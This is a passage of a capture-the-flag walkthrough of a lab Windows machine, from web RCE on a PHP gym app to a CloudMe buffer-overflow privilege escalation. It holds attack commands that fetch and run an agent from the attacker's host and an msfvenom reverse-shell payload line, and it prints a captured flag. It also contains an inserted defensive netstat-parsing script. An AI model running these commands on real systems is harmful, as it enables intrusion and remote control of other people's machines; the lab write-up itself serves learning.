## Recon
### Website - 8080 HTTP
**Server:** Apache/2.4.43
**Language:** PHP/7.46
**Package Vendor:** https://projectworlds.in/php-projects/gym-management-system-project-in-php/
![[Pasted image 20250217172052.png]]
![[Pasted image 20250217172103.png]]
From the projectworlds.in website:
![[Pasted image 20250217172318.png]]
- attempted default credentials, no love
## Initial Access
During our enumeration we discover the following [unauthenticated RCE exploit](https://www.exploit-db.com/exploits/48506).
```sh
╭─[λ]-[~/targets/buff/initial-access/exploit]-[10.10.10.198]
╰─> ./bin/python ./exploit.py http://$RHOST:8080/
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[+] Successfully connected to webshell.
```
The shell is acting rather funky, so I'll proceed to:
- generate a [[Sliver C2]] agent
- serve it using `sudo python3 -m http.server 8000`
- download it from the reverse shell: `curl http://10.10.14.11:8000/MIGHTY_RANK.exe -o agent.exe`
- and finally execute it: `.\agent.exe`
Once we're up and running I'll go ahead and grab the user flag:
```powershell
cat C:\Users\shaun\Desktop\user.txt
876f379fd681c53338e59326d5d4e284
```
Solved this part in about 30 minutes.
## Privesc
- running [[Winpeas]] yields nothing of interest
- credential hunting reveals a few database-related password strings, but this approach is ultimately unfruitful and took way too much of my time.
- I have a gander at dumping the database and parsing it for sensitive data: nothing. Again, I ended up wasting a ton of time here rather than pivoting.
### Interesting Binaries - CloudMe
- Had to take a hint here which suggested to search through `C:\Users\shaun\` home directory for an interesting binary.
```powershell
Get-ChildItem -Path "C:\Users\shaun\" -Recurse -Include *.exe, *.txt
Directory: C:\Users\shaun\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 17/02/2025 15:57 34 user.txt
-a---- 17/02/2025 16:55 10141184 winpeas.exe
Directory: C:\Users\shaun\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 16/06/2020 16:26 17830824 CloudMe_1112.exe
```
A quick Google search of `CloudMe_1112.exe` reveals https://www.exploit-db.com/exploits/48389. All of the exploits are written in Python, which complicates things, as there is no Python runtime installed on the system.
The service opens up port `:8888` on the `localhost` interface only, while all the available exploits assume they are executed from our attacker machine against a reachable port.
```powershell
# start the binary
C:\users\shaun\downloads\cloudme_1112.exe
# verify port bind
netstat -ano | findstr :8888
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 5012
```
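The `netstat` check above is the step that decides everything that follows: a service bound to `127.0.0.1` is invisible from the network but still reachable by anything running on the host. As an added example (not part of the original notes), the following Python parses `netstat -ano` output and separates loopback-only listeners from externally exposed ones, with the owning PID for each. The sample output is constructed for the example, not captured from the target; the address/port numbers mirror the ones discussed on this page.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample of `netstat -ano` output (not captured from the target).
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       1234
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       5012
  TCP    10.10.10.198:49670     10.10.14.11:4444       ESTABLISHED     2468
  TCP    [::]:135               [::]:0                 LISTENING       892
  UDP    0.0.0.0:5353           *:*                                    1560
"""


@dataclass(frozen=True)
class Listener:
    proto: str
    address: str
    port: int
    pid: int

    @property
    def loopback_only(self) -> bool:
        # Bound to the loopback interface: reachable only from the host itself.
        return self.address in ("127.0.0.1", "[::1]")


# proto, local address, local port, foreign address, optional state (UDP has none), PID
LINE_RE = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)\s+(?:(\S+)\s+)?(\d+)\s*$"
)


def parse_netstat(output: str) -> List[Listener]:
    """Return every listening socket found in `netstat -ano` output."""
    listeners: List[Listener] = []
    for line in output.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue  # header, blank line, or something we do not recognise
        proto, addr, port, _foreign, state, pid = match.groups()
        # TCP sockets only count when LISTENING; UDP sockets carry no state.
        if proto == "TCP" and state != "LISTENING":
            continue
        listeners.append(Listener(proto, addr, int(port), int(pid)))
    return listeners


def split_by_exposure(listeners: List[Listener]) -> Dict[str, List[int]]:
    """Group listening ports by whether they are loopback-only or externally bound."""
    report: Dict[str, List[int]] = {"loopback": [], "external": []}
    for item in listeners:
        key = "loopback" if item.loopback_only else "external"
        report[key].append(item.port)
    for ports in report.values():
        ports.sort()
    return report


def pid_for_port(listeners: List[Listener], port: int) -> Optional[int]:
    """PID owning the listener on `port`, or None if nothing listens there."""
    for item in listeners:
        if item.port == port:
            return item.pid
    return None


if __name__ == "__main__":
    found = parse_netstat(SAMPLE_NETSTAT)
    for item in found:
        scope = "loopback-only" if item.loopback_only else "exposed"
        print(f"{item.proto} {item.address}:{item.port} pid={item.pid} ({scope})")
    print(split_by_exposure(found))
```

On a real host, feed the function the actual output (`subprocess.run(["netstat", "-ano"], capture_output=True, text=True).stdout`) and cross-check each PID against the process list; a loopback-only listener owned by an unexpected binary is exactly the kind of finding that deserves attention even though an external port scan will never show it.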
This means that we will need to perform some port forwarding, which may be achieved using Sliver C2's built-in port forwarding functionality:
```sliver
portfwd add --bind 0.0.0.0:8888 --remote 0.0.0.0:8888
```
Performing a quick test of the connection from our attacker machine:
```sh
nc -vz 127.0.0.1 8888
Connection to 127.0.0.1 8888 port [tcp/*] succeeded!
```
We generate a payload using [[zettelkasten/msfvenom|msfvenom]]:
```sh
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.11 LPORT=4444 -b '\x00\x0A\x0D' -f python
```
Paste the generated shellcode into the `privesc/exploit.py` file, and execute.
And that's it...
## Lessons Learned
Got stuck chasing red herrings for the privesc, got tunnel-visioned on credential hunting and database dumping. When I took a hint and realized that I should have looked in the `Downloads` folder I felt rather silly. I quickly identified the remaining privesc but got stuck for a really long time panicking and being unable to make port forwarding work as intended. Time eventually ran out. Remedied the whole ordeal by writing a better cheatsheet/documentation for [[Pivoting and Port Forwarding]]. Furthermore I learned about [[DBeaver-TODO]] and got a lot better at credential hunting etc.